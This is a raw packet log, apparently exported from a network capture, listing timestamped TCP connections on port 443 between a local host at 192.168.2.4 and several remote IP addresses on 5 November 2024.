                                                                                                                                    Nov 5, 2024 09:02:16.827025890 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.827061892 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.827066898 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.868871927 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.880511999 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.880598068 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.996370077 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.996408939 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.996459961 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.996485949 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.996499062 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.996531963 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.038747072 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.038809061 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.038821936 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.085335016 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.112281084 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.112292051 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.112338066 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.112345934 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.112370968 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.112399101 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.112423897 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.228372097 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.228394985 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.228441000 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.228465080 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.228477955 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.228493929 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.249344110 CET44349739142.250.186.164192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.254568100 CET49739443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:02:17.254582882 CET44349739142.250.186.164192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.255722046 CET44349739142.250.186.164192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.255775928 CET49739443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:02:17.257258892 CET49739443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:02:17.257324934 CET44349739142.250.186.164192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.307184935 CET49739443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:02:17.307198048 CET44349739142.250.186.164192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.343056917 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.343090057 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.343132019 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.343170881 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.343205929 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.343226910 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.353880882 CET49739443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:02:17.459189892 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.459213018 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.459270000 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.459296942 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.459336996 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.459362030 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.550101042 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.550121069 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.550184965 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.550210953 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.550263882 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.574903011 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.574923038 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.574985027 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.574992895 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.575036049 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.690846920 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.690871000 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.690937996 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.690964937 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.691004038 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.807919025 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.807945013 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.807998896 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.808028936 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.808047056 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.808064938 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.808532000 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.808556080 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.808621883 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.808629036 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.808780909 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.921967030 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.921993017 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.922077894 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.922106028 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.922343016 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.964500904 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.964524984 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.964591026 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:17.964626074 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:17.964873075 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.038100004 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.038130999 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.038193941 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.038218975 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.038232088 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.038249969 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.128010035 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.128036976 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.128266096 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.128298044 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.131656885 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.193175077 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.193205118 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.193298101 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.193325996 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.195651054 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.274816036 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.274854898 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.275085926 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.275111914 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.275161028 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.309079885 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.309106112 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.309194088 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.309204102 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.309246063 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.389121056 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.389141083 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.389190912 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.389199972 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.389306068 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.425123930 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.425142050 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.425220966 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.425230980 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.425263882 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.504647970 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.504666090 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.504740000 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.504751921 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.504796028 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.539331913 CET49745443192.168.2.4184.28.90.27
                                                                                                                                    Nov 5, 2024 09:02:18.539355040 CET44349745184.28.90.27192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.539678097 CET49745443192.168.2.4184.28.90.27
                                                                                                                                    Nov 5, 2024 09:02:18.540627003 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.540643930 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.540705919 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.540714025 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.540764093 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.543587923 CET49745443192.168.2.4184.28.90.27
                                                                                                                                    Nov 5, 2024 09:02:18.543601036 CET44349745184.28.90.27192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.620594978 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.620618105 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.620807886 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.620816946 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.622230053 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.656028986 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.656045914 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.656115055 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.656121016 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.656157017 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.736035109 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.736053944 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.736124992 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.736133099 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.736176014 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.771486998 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.771506071 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.771543980 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.771548986 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.771589994 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.822575092 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.822599888 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.822654009 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.822668076 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.822716951 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.853113890 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.853137016 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.853180885 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.853199005 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.853234053 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.853254080 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.887569904 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.887589931 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.887641907 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.887646914 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.887686968 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.968149900 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.968167067 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.968239069 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:18.968246937 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:18.968296051 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.003015041 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.003031015 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.003087997 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.003097057 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.003137112 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.082998037 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.083018064 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.083060026 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.083069086 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.083112955 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.084218025 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.084233999 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.084276915 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.084283113 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.084311962 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.084331036 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.118872881 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.118900061 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.118940115 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.118952990 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.118994951 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.119005919 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.199084044 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.199101925 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.199146032 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.199163914 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.199188948 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.199203014 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.200067997 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.200083017 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.200123072 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.200129986 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.200167894 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.235019922 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.235042095 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.235083103 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.235091925 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.235121965 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.235141039 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.314871073 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.314888000 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.314939976 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.314949989 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.314985037 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.315002918 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.315834045 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.315850019 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.315893888 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.315901995 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.315931082 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.315944910 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.350697041 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.350716114 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.350770950 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.350779057 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.350830078 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.430454016 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.430469990 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.430543900 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.430555105 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.430579901 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.430600882 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.465392113 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.465421915 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.465470076 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.465497017 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.465513945 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.465547085 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.466587067 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.466600895 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.466640949 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.466656923 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.466675997 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.466690063 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.546449900 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.546464920 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.546515942 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.546544075 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.546577930 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.547265053 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.547280073 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.547321081 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.547331095 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.547348022 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.547373056 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.582149029 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.582165003 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.582215071 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.582257032 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.582272053 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.582294941 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.662240982 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.662261963 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.662319899 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.662344933 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.662363052 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.662384033 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.662965059 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.662986994 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.663023949 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.663031101 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.663058043 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.663073063 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.697381020 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.697457075 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.697549105 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.697618961 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.982345104 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.982381105 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.982422113 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.982450008 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.982465982 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.983051062 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.983077049 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.983112097 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.983124971 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.983149052 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.985085011 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.987426996 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.987452984 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.987504959 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.987535954 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.987535954 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.987544060 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.987564087 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.987579107 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.987623930 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:19.988776922 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:19.988795996 CET4434973554.81.94.16192.168.2.4
